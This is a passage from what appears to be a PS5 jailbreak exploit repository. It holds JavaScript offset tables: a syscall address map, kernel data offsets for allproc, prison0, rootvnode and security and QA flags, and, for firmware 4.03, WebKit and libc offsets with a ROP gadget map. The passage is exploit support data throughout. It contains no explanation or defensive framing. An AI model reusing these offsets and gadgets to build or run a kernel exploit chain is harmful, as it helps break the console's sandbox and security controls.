169 | 0x145: 0x34900, // sys_munlockall
170 | 0x147: 0x33600, // sys_sched_setparam
171 | 0x148: 0x34270, // sys_sched_getparam
172 | 0x149: 0x32DC0, // sys_sched_setscheduler
173 | 0x14A: 0x33C40, // sys_sched_getscheduler
174 | 0x14B: 0x33AA0, // sys_sched_yield
175 | 0x14C: 0x33040, // sys_sched_get_priority_max
176 | 0x14D: 0x33160, // sys_sched_get_priority_min
177 | 0x14E: 0x33390, // sys_sched_rr_get_interval
178 | 0x154: 0x32B50, // sys_sigprocmask
179 | 0x155: 0x32B90, // sys_sigsuspend
180 | 0x157: 0x34A60, // sys_sigpending
181 | 0x159: 0x34B80, // sys_sigtimedwait
182 | 0x15A: 0x347C0, // sys_sigwaitinfo
183 | 0x16A: 0x34DA0, // sys_kqueue
184 | 0x16B: 0x33000, // sys_kevent
185 | 0x17B: 0x32FA0, // sys_mtypeprotect
186 | 0x188: 0x330C0, // sys_uuidgen
187 | 0x189: 0x35510, // sys_sendfile
188 | 0x18D: 0x33560, // sys_fstatfs
189 | 0x190: 0x33120, // sys_ksem_close
190 | 0x191: 0x33EB0, // sys_ksem_post
191 | 0x192: 0x34750, // sys_ksem_wait
192 | 0x193: 0x354F0, // sys_ksem_trywait
193 | 0x194: 0x33260, // sys_ksem_init
194 | 0x195: 0x34C80, // sys_ksem_open
195 | 0x196: 0x34960, // sys_ksem_unlink
196 | 0x197: 0x330E0, // sys_ksem_getvalue
197 | 0x198: 0x34920, // sys_ksem_destroy
198 | 0x1A0: 0x34E00, // sys_sigaction
199 | 0x1A1: 0x34AA0, // sys_sigreturn
200 | 0x1A5: 0x33780, // sys_getcontext
201 | 0x1A6: 0x344B0, // sys_setcontext
202 | 0x1A7: 0x345D0, // sys_swapcontext
203 | 0x1AD: 0x337D0, // sys_sigwait
204 | 0x1AE: 0x32EA0, // sys_thr_create
205 | 0x1AF: 0x33200, // sys_thr_exit
206 | 0x1B0: 0x33BA0, // sys_thr_self
207 | 0x1B1: 0x33220, // sys_thr_kill
208 | 0x1B9: 0x34840, // sys_ksem_timedwait
209 | 0x1BA: 0x32B70, // sys_thr_suspend
210 | 0x1BB: 0x334A0, // sys_thr_wake
211 | 0x1BC: 0x34510, // sys_kldunloadf
212 | 0x1C6: 0x35200, // sys__umtx_op
213 | 0x1C7: 0x34F40, // sys_thr_new
214 | 0x1C8: 0x34EA0, // sys_sigqueue
215 | 0x1D0: 0x34800, // sys_thr_set_name
216 | 0x1D2: 0x33DB0, // sys_rtprio_thread
217 | 0x1DB: 0x33540, // sys_pread
218 | 0x1DC: 0x34650, // sys_pwrite
219 | 0x1DD: 0x34F20, // sys_mmap
220 | 0x1DE: 0x34A20, // sys_lseek
221 | 0x1DF: 0x33AC0, // sys_truncate
222 | 0x1E0: 0x33520, // sys_ftruncate
223 | 0x1E1: 0x32B10, // sys_thr_kill2
224 | 0x1E2: 0x35490, // sys_shm_open
225 | 0x1E3: 0x34F00, // sys_shm_unlink
226 | 0x1E6: 0x33740, // sys_cpuset_getid
227 | 0x1E7: 0x35300, // sys_cpuset_getaffinity
228 | 0x1E8: 0x34AC0, // sys_cpuset_setaffinity
229 | 0x1F3: 0x32EE0, // sys_openat
230 | 0x203: 0x34590, // sys___cap_rights_get
231 | 0x20A: 0x33FD0, // sys_pselect
232 | 0x214: 0x34090, // sys_regmgr_call
233 | 0x215: 0x33E10, // sys_jitshm_create
234 | 0x216: 0x343F0, // sys_jitshm_alias
235 | 0x217: 0x332E0, // sys_dl_get_list
236 | 0x218: 0x34130, // sys_dl_get_info
237 | 0x21A: 0x34070, // sys_evf_create
238 | 0x21B: 0x334C0, // sys_evf_delete
239 | 0x21C: 0x34410, // sys_evf_open
240 | 0x21D: 0x33FF0, // sys_evf_close
241 | 0x21E: 0x342B0, // sys_evf_wait
242 | 0x21F: 0x34A80, // sys_evf_trywait
243 | 0x220: 0x34430, // sys_evf_set
244 | 0x221: 0x349A0, // sys_evf_clear
245 | 0x222: 0x337B0, // sys_evf_cancel
246 | 0x223: 0x34290, // sys_query_memory_protection
247 | 0x224: 0x33B80, // sys_batch_map
248 | 0x225: 0x33D90, // sys_osem_create
249 | 0x226: 0x32D60, // sys_osem_delete
250 | 0x227: 0x32CE0, // sys_osem_open
251 | 0x228: 0x352E0, // sys_osem_close
252 | 0x229: 0x34370, // sys_osem_wait
253 | 0x22A: 0x34980, // sys_osem_trywait
254 | 0x22B: 0x34610, // sys_osem_post
255 | 0x22C: 0x33EF0, // sys_osem_cancel
256 | 0x22D: 0x33CA0, // sys_namedobj_create
257 | 0x22E: 0x339A0, // sys_namedobj_delete
258 | 0x22F: 0x35570, // sys_set_vm_container
259 | 0x230: 0x33460, // sys_debug_init
260 | 0x233: 0x33DD0, // sys_opmc_enable
261 | 0x234: 0x32E40, // sys_opmc_disable
262 | 0x235: 0x33E50, // sys_opmc_set_ctl
263 | 0x236: 0x33E70, // sys_opmc_set_ctr
264 | 0x237: 0x348C0, // sys_opmc_get_ctr
265 | 0x23C: 0x336E0, // sys_virtual_query
266 | 0x249: 0x34D00, // sys_is_in_sandbox
267 | 0x24A: 0x338C0, // sys_dmem_container
268 | 0x24B: 0x34170, // sys_get_authinfo
269 | 0x24C: 0x32CC0, // sys_mname
270 | 0x24F: 0x332C0, // sys_dynlib_dlsym
271 | 0x250: 0x335C0, // sys_dynlib_get_list
272 | 0x251: 0x35060, // sys_dynlib_get_info
273 | 0x252: 0x33F70, // sys_dynlib_load_prx
274 | 0x253: 0x32F60, // sys_dynlib_unload_prx
275 | 0x254: 0x34DE0, // sys_dynlib_do_copy_relocations
276 | 0x256: 0x33D70, // sys_dynlib_get_proc_param
277 | 0x257: 0x350C0, // sys_dynlib_process_needed_and_relocate
278 | 0x258: 0x32B30, // sys_sandbox_path
279 | 0x259: 0x336A0, // sys_mdbg_service
280 | 0x25A: 0x33D30, // sys_randomized_path
281 | 0x25B: 0x34BA0, // sys_rdup
282 | 0x25C: 0x331A0, // sys_dl_get_metadata
283 | 0x25D: 0x338E0, // sys_workaround8849
284 | 0x25E: 0x330A0, // sys_is_development_mode
285 | 0x25F: 0x34210, // sys_get_self_auth_info
286 | 0x260: 0x354B0, // sys_dynlib_get_info_ex
287 | 0x262: 0x35550, // sys_budget_get_ptype
288 | 0x263: 0x333B0, // sys_get_paging_stats_of_all_threads
289 | 0x264: 0x352C0, // sys_get_proc_type_info
290 | 0x265: 0x32AD0, // sys_get_resident_count
291 | 0x267: 0x33E30, // sys_get_resident_fmem_count
292 | 0x268: 0x34EE0, // sys_thr_get_name
293 | 0x269: 0x344F0, // sys_set_gpo
294 | 0x26A: 0x341F0, // sys_get_paging_stats_of_all_objects
295 | 0x26B: 0x32FE0, // sys_test_debug_rwmem
296 | 0x26C: 0x33100, // sys_free_stack
297 | 0x26E: 0x32D00, // sys_ipmimgr_call
298 | 0x26F: 0x34150, // sys_get_gpo
299 | 0x270: 0x35530, // sys_get_vm_map_timestamp
300 | 0x271: 0x34AE0, // sys_opmc_set_hw
301 | 0x272: 0x33620, // sys_opmc_get_hw
302 | 0x273: 0x32CA0, // sys_get_cpu_usage_all
303 | 0x274: 0x34310, // sys_mmap_dmem
304 | 0x275: 0x336C0, // sys_physhm_open
305 | 0x276: 0x33ED0, // sys_physhm_unlink
306 | 0x278: 0x35470, // sys_thr_suspend_ucontext
307 | 0x279: 0x33960, // sys_thr_resume_ucontext
308 | 0x27A: 0x33920, // sys_thr_get_ucontext
309 | 0x27B: 0x33A20, // sys_thr_set_ucontext
310 | 0x27C: 0x33660, // sys_set_timezone_info
311 | 0x27D: 0x343B0, // sys_set_phys_fmem_limit
312 | 0x27E: 0x33760, // sys_utc_to_localtime
313 | 0x27F: 0x35590, // sys_localtime_to_utc
314 | 0x280: 0x34710, // sys_set_uevt
315 | 0x281: 0x33280, // sys_get_cpu_usage_proc
316 | 0x282: 0x33B00, // sys_get_map_statistics
317 | 0x283: 0x348A0, // sys_set_chicken_switches
318 | 0x286: 0x351C0, // sys_get_kernel_mem_statistics
319 | 0x287: 0x343D0, // sys_get_sdk_compiled_version
320 | 0x288: 0x32D40, // sys_app_state_change
321 | 0x289: 0x34F60, // sys_dynlib_get_obj_member
322 | 0x28C: 0x32DE0, // sys_process_terminate
323 | 0x28D: 0x335A0, // sys_blockpool_open
324 | 0x28E: 0x33340, // sys_blockpool_map
325 | 0x28F: 0x34D80, // sys_blockpool_unmap
326 | 0x290: 0x349C0, // sys_dynlib_get_info_for_libdbg
327 | 0x291: 0x33A80, // sys_blockpool_batch
328 | 0x292: 0x331E0, // sys_fdatasync
329 | 0x293: 0x33700, // sys_dynlib_get_list2
330 | 0x294: 0x35450, // sys_dynlib_get_info2
331 | 0x295: 0x34C00, // sys_aio_submit
332 | 0x296: 0x33180, // sys_aio_multi_delete
333 | 0x297: 0x33FB0, // sys_aio_multi_wait
334 | 0x298: 0x33060, // sys_aio_multi_poll
335 | 0x299: 0x34B00, // sys_aio_get_data
336 | 0x29A: 0x33F90, // sys_aio_multi_cancel
337 | 0x29B: 0x32F40, // sys_get_bio_usage_all
338 | 0x29C: 0x34630, // sys_aio_create
339 | 0x29D: 0x350A0, // sys_aio_submit_cmd
340 | 0x29E: 0x34FA0, // sys_aio_init
341 | 0x29F: 0x34A00, // sys_get_page_table_stats
342 | 0x2A0: 0x34E60, // sys_dynlib_get_list_for_libdbg
343 | 0x2A1: 0x35000, // sys_blockpool_move
344 | 0x2A2: 0x34E80, // sys_virtual_query_all
345 | 0x2A3: 0x33F30, // sys_reserve_2mb_page
346 | 0x2A4: 0x347E0, // sys_cpumode_yield
347 | 0x2A5: 0x342F0, // sys_wait6
348 | 0x2A6: 0x33D50, // sys_cap_rights_limit
349 | 0x2A7: 0x33320, // sys_cap_ioctls_limit
350 | 0x2A8: 0x34050, // sys_cap_ioctls_get
351 | 0x2A9: 0x34820, // sys_cap_fcntls_limit
352 | 0x2AA: 0x32FC0, // sys_cap_fcntls_get
353 | 0x2AB: 0x35320, // sys_bindat
354 | 0x2AC: 0x33B20, // sys_connectat
355 | 0x2AD: 0x32D80, // sys_chflagsat
356 | 0x2AE: 0x32BD0, // sys_accept4
357 | 0x2AF: 0x331C0, // sys_pipe2
358 | 0x2B0: 0x33BC0, // sys_aio_mlock
359 | 0x2B1: 0x352A0, // sys_procctl
360 | 0x2B2: 0x34550, // sys_ppoll
361 | 0x2B3: 0x34490, // sys_futimens
362 | 0x2B4: 0x34C40, // sys_utimensat
363 | 0x2B5: 0x341B0, // sys_numa_getaffinity
364 | 0x2B6: 0x34010, // sys_numa_setaffinity
365 | 0x2C1: 0x33020, // sys_get_phys_page_size
366 | 0x2C9: 0x35280, // sys_get_ppr_sdk_compiled_version
367 | 0x2CC: 0x33860, // sys_openintr
368 | 0x2CD: 0x34350, // sys_dl_get_info_2
369 | 0x2CE: 0x33940, // sys_acinfo_add
370 | 0x2CF: 0x32BB0, // sys_acinfo_delete
371 | 0x2D0: 0x34BE0, // sys_acinfo_get_all_for_coredump
372 | 0x2D1: 0x34CA0, // sys_ampr_ctrl_debug
373 | 0x2D2: 0x32E00, // sys_workspace_ctrl
374 | };
375 |
376 | const OFFSET_KERNEL_DATA_KQUEUE_LOW_WORD = 0x8D2F;
377 | const OFFSET_KERNEL_DATA_KQUEUE_BASE_SLIDE = 0x318D2F;
378 | const OFFSET_KERNEL_TEXT_KQUEUE_BASE_SLIDE = 0xF18D2F;
379 | const OFFSET_KERNEL_DATA_BASE_ALLPROC = 0x27EDCB8;
380 | const OFFSET_KERNEL_DATA_BASE_SECURITYFLAGS = 0x6506474;
381 | const OFFSET_KERNEL_DATA_BASE_TARGETID = 0x650647D;
382 | const OFFSET_KERNEL_DATA_BASE_QA_FLAGS = 0x6506498;
383 | const OFFSET_KERNEL_DATA_BASE_UTOKEN_FLAGS = 0x6506500;
384 | const OFFSET_KERNEL_DATA_BASE_PRISON0 = 0x1D34D00;
385 | const OFFSET_KERNEL_DATA_BASE_ROOTVNODE = 0x66E74C0;
386 |
--------------------------------------------------------------------------------
/document/en/ps5/offsets/4.03.js:
--------------------------------------------------------------------------------
1 | const OFFSET_wk_vtable_first_element = 0x00D04580;
2 | const OFFSET_wk_memset_import = 0x028F9D38;
3 | const OFFSET_wk___stack_chk_guard_import = 0x028F9A18;
4 |
5 | const OFFSET_lk___stack_chk_guard = 0x00069190;
6 | const OFFSET_lk_pthread_create_name_np = 0x00001B60;
7 | const OFFSET_lk_pthread_join = 0x0002FAD0;
8 | const OFFSET_lk_pthread_exit = 0x00020A80;
9 | const OFFSET_lk__thread_list = 0x000601A8;
10 |
11 | const OFFSET_lc_memset = 0x000148F0;
12 | const OFFSET_lc_setjmp = 0x0005E9B0;
13 | const OFFSET_lc_longjmp = 0x0005EA00;
14 |
15 | const OFFSET_WORKER_STACK_OFFSET = 0x0007FB88;
16 |
17 | let wk_gadgetmap = {
18 | "ret" : 0x00000042,
19 | "pop rdi": 0x00043B7C,
20 | "pop rsi": 0x0008F33E,
21 | "pop rdx": 0x000156EA,
22 | "pop rcx": 0x00060DF3,
23 | "pop r8": 0x01262A4F,
24 | "pop r9" : 0x004E450C,
25 | "pop rax": 0x00084094,
26 | "pop rsp": 0x0005D293,
27 |
28 | "mov [rdi], rsi": 0x00118570,
29 | "mov [rdi], rax": 0x00C3A5C0,
30 | "mov [rdi], eax": 0x003FB6E6,
31 |
32 | "infloop": 0x000109E1,
33 |
34 | //branching specific gadgets
35 | "cmp [rcx], eax" : 0x00204122,
36 | "sete al" : 0x00B7B735,
37 | "seta al" : 0x000CCFB4,
38 | "setb al" : 0x001B7657,
39 | "setg al" : 0x000708c9,
40 | "setl al" : 0x01517692,
41 | "shl rax, 3" : 0x01A43F03,
42 | "add rax, rdx" : 0x016F4948,
43 | "mov rax, [rax]" : 0x0142E309,
44 | "inc dword [rax]": 0x017629AF,
45 | };
46 |
47 | let syscall_map = {
48 | 0x001: 0x34230, // sys_exit
49 | 0x002: 0x351E0, // sys_fork
50 | 0x003: 0x33400, // sys_read
51 | 0x004: 0x33360, // sys_write
52 | 0x005: 0x33A00, // sys_open
53 | 0x006: 0x34030, // sys_close
54 | 0x007: 0x32C20, // sys_wait4
55 | 0x00A: 0x34D20, // sys_unlink
56 | 0x00C: 0x346B0, // sys_chdir
57 | 0x00F: 0x340B0, // sys_chmod
58 | 0x014: 0x33580, // sys_getpid
59 | 0x017: 0x33080, // sys_setuid
60 | 0x018: 0x34690, // sys_getuid
61 | 0x019: 0x33A40, // sys_geteuid
62 | 0x01B: 0x33AE0, // sys_recvmsg
63 | 0x01C: 0x33D10, // sys_sendmsg
64 | 0x01D: 0x34860, // sys_recvfrom
65 | 0x01E: 0x32F80, // sys_accept
66 | 0x01F: 0x32DA0, // sys_getpeername
67 | 0x020: 0x34EC0, // sys_getsockname
68 | 0x021: 0x349E0, // sys_access
69 | 0x022: 0x34B60, // sys_chflags
70 | 0x023: 0x34530, // sys_fchflags
71 | 0x024: 0x35410, // sys_sync
72 | 0x025: 0x339E0, // sys_kill
73 | 0x027: 0x33480, // sys_getppid
74 | 0x029: 0x34A40, // sys_dup
75 | 0x02A: 0x333D0, // sys_pipe
76 | 0x02B: 0x35080, // sys_getegid
77 | 0x02C: 0x353D0, // sys_profil
78 | 0x02F: 0x32F20, // sys_getgid
79 | 0x031: 0x32F00, // sys_getlogin
80 | 0x032: 0x34790, // sys_setlogin
81 | 0x035: 0x33140, // sys_sigaltstack
82 | 0x036: 0x332A0, // sys_ioctl
83 | 0x037: 0x34570, // sys_reboot
84 | 0x038: 0x34470, // sys_revoke
85 | 0x03B: 0x34770, // sys_execve
86 | 0x041: 0x34110, // sys_msync
87 | 0x049: 0x33900, // sys_munmap
88 | 0x04A: 0x34670, // sys_mprotect
89 | 0x04B: 0x337F0, // sys_madvise
90 | 0x04E: 0x339C0, // sys_mincore
91 | 0x04F: 0x32E80, // sys_getgroups
92 | 0x050: 0x33420, // sys_setgroups
93 | 0x053: 0x32E60, // sys_setitimer
94 | 0x056: 0x32C80, // sys_getitimer
95 | 0x059: 0x344D0, // sys_getdtablesize
96 | 0x05A: 0x348E0, // sys_dup2
97 | 0x05C: 0x33F10, // sys_fcntl
98 | 0x05D: 0x33A60, // sys_select
99 | 0x05F: 0x32EC0, // sys_fsync
100 | 0x060: 0x33DF0, // sys_setpriority
101 | 0x061: 0x33640, // sys_socket
102 | 0x062: 0x346D0, // sys_connect
103 | 0x063: 0x35040, // sys_netcontrol
104 | 0x064: 0x32C40, // sys_getpriority
105 | 0x065: 0x34C60, // sys_netabort
106 | 0x066: 0x34FE0, // sys_netgetsockinfo
107 | 0x068: 0x34CE0, // sys_bind
108 | 0x069: 0x33F50, // sys_setsockopt
109 | 0x06A: 0x33240, // sys_listen
110 | 0x071: 0x34250, // sys_socketex
111 | 0x072: 0x33C20, // sys_socketclose
112 | 0x074: 0x353F0, // sys_gettimeofday
113 | 0x075: 0x354D0, // sys_getrusage
114 | 0x076: 0x32C00, // sys_getsockopt
115 | 0x078: 0x33E90, // sys_readv
116 | 0x079: 0x33CF0, // sys_writev
117 | 0x07A: 0x34940, // sys_settimeofday
118 | 0x07C: 0x33880, // sys_fchmod
119 | 0x07D: 0x340F0, // sys_netgetiflist
120 | 0x07E: 0x34FC0, // sys_setreuid
121 | 0x07F: 0x33BE0, // sys_setregid
122 | 0x080: 0x34B40, // sys_rename
123 | 0x083: 0x33B60, // sys_flock
124 | 0x085: 0x35430, // sys_sendto
125 | 0x086: 0x35260, // sys_shutdown
126 | 0x087: 0x345F0, // sys_socketpair
127 | 0x088: 0x34390, // sys_mkdir
128 | 0x089: 0x335E0, // sys_rmdir
129 | 0x08A: 0x32AF0, // sys_utimes
130 | 0x08C: 0x34F80, // sys_adjtime
131 | 0x08D: 0x340D0, // sys_kqueueex
132 | 0x093: 0x34330, // sys_setsid
133 | 0x0A5: 0x32E20, // sys_sysarch
134 | 0x0B6: 0x34DC0, // sys_setegid
135 | 0x0B7: 0x32C60, // sys_seteuid
136 | 0x0BC: 0x34E20, // sys_stat
137 | 0x0BD: 0x35220, // sys_fstat
138 | 0x0BE: 0x33C00, // sys_lstat
139 | 0x0BF: 0x33300, // sys_pathconf
140 | 0x0C0: 0x345B0, // sys_fpathconf
141 | 0x0C2: 0x33B40, // sys_getrlimit
142 | 0x0C3: 0x33720, // sys_setrlimit
143 | 0x0C4: 0x34D40, // sys_getdirentries
144 | 0x0CA: 0x34B20, // sys___sysctl
145 | 0x0CB: 0x341D0, // sys_mlock
146 | 0x0CC: 0x34BC0, // sys_munlock
147 | 0x0CE: 0x33680, // sys_futimes
148 | 0x0D1: 0x33C60, // sys_poll
149 | 0x0E8: 0x32D20, // sys_clock_gettime
150 | 0x0E9: 0x34190, // sys_clock_settime
151 | 0x0EA: 0x35190, // sys_clock_getres
152 | 0x0EB: 0x34D60, // sys_ktimer_create
153 | 0x0EC: 0x334E0, // sys_ktimer_delete
154 | 0x0ED: 0x35240, // sys_ktimer_settime
155 | 0x0EE: 0x346F0, // sys_ktimer_gettime
156 | 0x0EF: 0x338A0, // sys_ktimer_getoverrun
157 | 0x0F0: 0x34C20, // sys_nanosleep
158 | 0x0F1: 0x34450, // sys_ffclock_getcounter
159 | 0x0F2: 0x33440, // sys_ffclock_setestimate
160 | 0x0F3: 0x342D0, // sys_ffclock_getestimate
161 | 0x0F7: 0x34CC0, // sys_clock_getcpuclockid2
162 | 0x0FD: 0x34880, // sys_issetugid
163 | 0x110: 0x35020, // sys_getdents
164 | 0x121: 0x34730, // sys_preadv
165 | 0x122: 0x33C80, // sys_pwritev
166 | 0x136: 0x33980, // sys_getsid
167 | 0x13B: 0x34E40, // sys_aio_suspend
168 | 0x144: 0x33500, // sys_mlockall
169 | 0x145: 0x34900, // sys_munlockall
170 | 0x147: 0x33600, // sys_sched_setparam
171 | 0x148: 0x34270, // sys_sched_getparam
172 | 0x149: 0x32DC0, // sys_sched_setscheduler
173 | 0x14A: 0x33C40, // sys_sched_getscheduler
174 | 0x14B: 0x33AA0, // sys_sched_yield
175 | 0x14C: 0x33040, // sys_sched_get_priority_max
176 | 0x14D: 0x33160, // sys_sched_get_priority_min
177 | 0x14E: 0x33390, // sys_sched_rr_get_interval
178 | 0x154: 0x32B50, // sys_sigprocmask
179 | 0x155: 0x32B90, // sys_sigsuspend
180 | 0x157: 0x34A60, // sys_sigpending
181 | 0x159: 0x34B80, // sys_sigtimedwait
182 | 0x15A: 0x347C0, // sys_sigwaitinfo
183 | 0x16A: 0x34DA0, // sys_kqueue
184 | 0x16B: 0x33000, // sys_kevent
185 | 0x17B: 0x32FA0, // sys_mtypeprotect
186 | 0x188: 0x330C0, // sys_uuidgen
187 | 0x189: 0x35510, // sys_sendfile
188 | 0x18D: 0x33560, // sys_fstatfs
189 | 0x190: 0x33120, // sys_ksem_close
190 | 0x191: 0x33EB0, // sys_ksem_post
191 | 0x192: 0x34750, // sys_ksem_wait
192 | 0x193: 0x354F0, // sys_ksem_trywait
193 | 0x194: 0x33260, // sys_ksem_init
194 | 0x195: 0x34C80, // sys_ksem_open
195 | 0x196: 0x34960, // sys_ksem_unlink
196 | 0x197: 0x330E0, // sys_ksem_getvalue
197 | 0x198: 0x34920, // sys_ksem_destroy
198 | 0x1A0: 0x34E00, // sys_sigaction
199 | 0x1A1: 0x34AA0, // sys_sigreturn
200 | 0x1A5: 0x33780, // sys_getcontext
201 | 0x1A6: 0x344B0, // sys_setcontext
202 | 0x1A7: 0x345D0, // sys_swapcontext
203 | 0x1AD: 0x337D0, // sys_sigwait
204 | 0x1AE: 0x32EA0, // sys_thr_create
205 | 0x1AF: 0x33200, // sys_thr_exit
206 | 0x1B0: 0x33BA0, // sys_thr_self
207 | 0x1B1: 0x33220, // sys_thr_kill
208 | 0x1B9: 0x34840, // sys_ksem_timedwait
209 | 0x1BA: 0x32B70, // sys_thr_suspend
210 | 0x1BB: 0x334A0, // sys_thr_wake
211 | 0x1BC: 0x34510, // sys_kldunloadf
212 | 0x1C6: 0x35200, // sys__umtx_op
213 | 0x1C7: 0x34F40, // sys_thr_new
214 | 0x1C8: 0x34EA0, // sys_sigqueue
215 | 0x1D0: 0x34800, // sys_thr_set_name
216 | 0x1D2: 0x33DB0, // sys_rtprio_thread
217 | 0x1DB: 0x33540, // sys_pread
218 | 0x1DC: 0x34650, // sys_pwrite
219 | 0x1DD: 0x34F20, // sys_mmap
220 | 0x1DE: 0x34A20, // sys_lseek
221 | 0x1DF: 0x33AC0, // sys_truncate
222 | 0x1E0: 0x33520, // sys_ftruncate
223 | 0x1E1: 0x32B10, // sys_thr_kill2
224 | 0x1E2: 0x35490, // sys_shm_open
225 | 0x1E3: 0x34F00, // sys_shm_unlink
226 | 0x1E6: 0x33740, // sys_cpuset_getid
227 | 0x1E7: 0x35300, // sys_cpuset_getaffinity
228 | 0x1E8: 0x34AC0, // sys_cpuset_setaffinity
229 | 0x1F3: 0x32EE0, // sys_openat
230 | 0x203: 0x34590, // sys___cap_rights_get
231 | 0x20A: 0x33FD0, // sys_pselect
232 | 0x214: 0x34090, // sys_regmgr_call
233 | 0x215: 0x33E10, // sys_jitshm_create
234 | 0x216: 0x343F0, // sys_jitshm_alias
235 | 0x217: 0x332E0, // sys_dl_get_list
236 | 0x218: 0x34130, // sys_dl_get_info
237 | 0x21A: 0x34070, // sys_evf_create
238 | 0x21B: 0x334C0, // sys_evf_delete
239 | 0x21C: 0x34410, // sys_evf_open
240 | 0x21D: 0x33FF0, // sys_evf_close
241 | 0x21E: 0x342B0, // sys_evf_wait
242 | 0x21F: 0x34A80, // sys_evf_trywait
243 | 0x220: 0x34430, // sys_evf_set
244 | 0x221: 0x349A0, // sys_evf_clear
245 | 0x222: 0x337B0, // sys_evf_cancel
246 | 0x223: 0x34290, // sys_query_memory_protection
247 | 0x224: 0x33B80, // sys_batch_map
248 | 0x225: 0x33D90, // sys_osem_create
249 | 0x226: 0x32D60, // sys_osem_delete
250 | 0x227: 0x32CE0, // sys_osem_open
251 | 0x228: 0x352E0, // sys_osem_close
252 | 0x229: 0x34370, // sys_osem_wait
253 | 0x22A: 0x34980, // sys_osem_trywait
254 | 0x22B: 0x34610, // sys_osem_post
255 | 0x22C: 0x33EF0, // sys_osem_cancel
256 | 0x22D: 0x33CA0, // sys_namedobj_create
257 | 0x22E: 0x339A0, // sys_namedobj_delete
258 | 0x22F: 0x35570, // sys_set_vm_container
259 | 0x230: 0x33460, // sys_debug_init
260 | 0x233: 0x33DD0, // sys_opmc_enable
261 | 0x234: 0x32E40, // sys_opmc_disable
262 | 0x235: 0x33E50, // sys_opmc_set_ctl
263 | 0x236: 0x33E70, // sys_opmc_set_ctr
264 | 0x237: 0x348C0, // sys_opmc_get_ctr
265 | 0x23C: 0x336E0, // sys_virtual_query
266 | 0x249: 0x34D00, // sys_is_in_sandbox
267 | 0x24A: 0x338C0, // sys_dmem_container
268 | 0x24B: 0x34170, // sys_get_authinfo
269 | 0x24C: 0x32CC0, // sys_mname
270 | 0x24F: 0x332C0, // sys_dynlib_dlsym
271 | 0x250: 0x335C0, // sys_dynlib_get_list
272 | 0x251: 0x35060, // sys_dynlib_get_info
273 | 0x252: 0x33F70, // sys_dynlib_load_prx
274 | 0x253: 0x32F60, // sys_dynlib_unload_prx
275 | 0x254: 0x34DE0, // sys_dynlib_do_copy_relocations
276 | 0x256: 0x33D70, // sys_dynlib_get_proc_param
277 | 0x257: 0x350C0, // sys_dynlib_process_needed_and_relocate
278 | 0x258: 0x32B30, // sys_sandbox_path
279 | 0x259: 0x336A0, // sys_mdbg_service
280 | 0x25A: 0x33D30, // sys_randomized_path
281 | 0x25B: 0x34BA0, // sys_rdup
282 | 0x25C: 0x331A0, // sys_dl_get_metadata
283 | 0x25D: 0x338E0, // sys_workaround8849
284 | 0x25E: 0x330A0, // sys_is_development_mode
285 | 0x25F: 0x34210, // sys_get_self_auth_info
286 | 0x260: 0x354B0, // sys_dynlib_get_info_ex
287 | 0x262: 0x35550, // sys_budget_get_ptype
288 | 0x263: 0x333B0, // sys_get_paging_stats_of_all_threads
289 | 0x264: 0x352C0, // sys_get_proc_type_info
290 | 0x265: 0x32AD0, // sys_get_resident_count
291 | 0x267: 0x33E30, // sys_get_resident_fmem_count
292 | 0x268: 0x34EE0, // sys_thr_get_name
293 | 0x269: 0x344F0, // sys_set_gpo
294 | 0x26A: 0x341F0, // sys_get_paging_stats_of_all_objects
295 | 0x26B: 0x32FE0, // sys_test_debug_rwmem
296 | 0x26C: 0x33100, // sys_free_stack
297 | 0x26E: 0x32D00, // sys_ipmimgr_call
298 | 0x26F: 0x34150, // sys_get_gpo
299 | 0x270: 0x35530, // sys_get_vm_map_timestamp
300 | 0x271: 0x34AE0, // sys_opmc_set_hw
301 | 0x272: 0x33620, // sys_opmc_get_hw
302 | 0x273: 0x32CA0, // sys_get_cpu_usage_all
303 | 0x274: 0x34310, // sys_mmap_dmem
304 | 0x275: 0x336C0, // sys_physhm_open
305 | 0x276: 0x33ED0, // sys_physhm_unlink
306 | 0x278: 0x35470, // sys_thr_suspend_ucontext
307 | 0x279: 0x33960, // sys_thr_resume_ucontext
308 | 0x27A: 0x33920, // sys_thr_get_ucontext
309 | 0x27B: 0x33A20, // sys_thr_set_ucontext
310 | 0x27C: 0x33660, // sys_set_timezone_info
311 | 0x27D: 0x343B0, // sys_set_phys_fmem_limit
312 | 0x27E: 0x33760, // sys_utc_to_localtime
313 | 0x27F: 0x35590, // sys_localtime_to_utc
314 | 0x280: 0x34710, // sys_set_uevt
315 | 0x281: 0x33280, // sys_get_cpu_usage_proc
316 | 0x282: 0x33B00, // sys_get_map_statistics
317 | 0x283: 0x348A0, // sys_set_chicken_switches
318 | 0x286: 0x351C0, // sys_get_kernel_mem_statistics
319 | 0x287: 0x343D0, // sys_get_sdk_compiled_version
320 | 0x288: 0x32D40, // sys_app_state_change
321 | 0x289: 0x34F60, // sys_dynlib_get_obj_member
322 | 0x28C: 0x32DE0, // sys_process_terminate
323 | 0x28D: 0x335A0, // sys_blockpool_open
324 | 0x28E: 0x33340, // sys_blockpool_map
325 | 0x28F: 0x34D80, // sys_blockpool_unmap
326 | 0x290: 0x349C0, // sys_dynlib_get_info_for_libdbg
327 | 0x291: 0x33A80, // sys_blockpool_batch
328 | 0x292: 0x331E0, // sys_fdatasync
329 | 0x293: 0x33700, // sys_dynlib_get_list2
330 | 0x294: 0x35450, // sys_dynlib_get_info2
331 | 0x295: 0x34C00, // sys_aio_submit
332 | 0x296: 0x33180, // sys_aio_multi_delete
333 | 0x297: 0x33FB0, // sys_aio_multi_wait
334 | 0x298: 0x33060, // sys_aio_multi_poll
335 | 0x299: 0x34B00, // sys_aio_get_data
336 | 0x29A: 0x33F90, // sys_aio_multi_cancel
337 | 0x29B: 0x32F40, // sys_get_bio_usage_all
338 | 0x29C: 0x34630, // sys_aio_create
339 | 0x29D: 0x350A0, // sys_aio_submit_cmd
340 | 0x29E: 0x34FA0, // sys_aio_init
341 | 0x29F: 0x34A00, // sys_get_page_table_stats
342 | 0x2A0: 0x34E60, // sys_dynlib_get_list_for_libdbg
343 | 0x2A1: 0x35000, // sys_blockpool_move
344 | 0x2A2: 0x34E80, // sys_virtual_query_all
345 | 0x2A3: 0x33F30, // sys_reserve_2mb_page
346 | 0x2A4: 0x347E0, // sys_cpumode_yield
347 | 0x2A5: 0x342F0, // sys_wait6
348 | 0x2A6: 0x33D50, // sys_cap_rights_limit
349 | 0x2A7: 0x33320, // sys_cap_ioctls_limit
350 | 0x2A8: 0x34050, // sys_cap_ioctls_get
351 | 0x2A9: 0x34820, // sys_cap_fcntls_limit
352 | 0x2AA: 0x32FC0, // sys_cap_fcntls_get
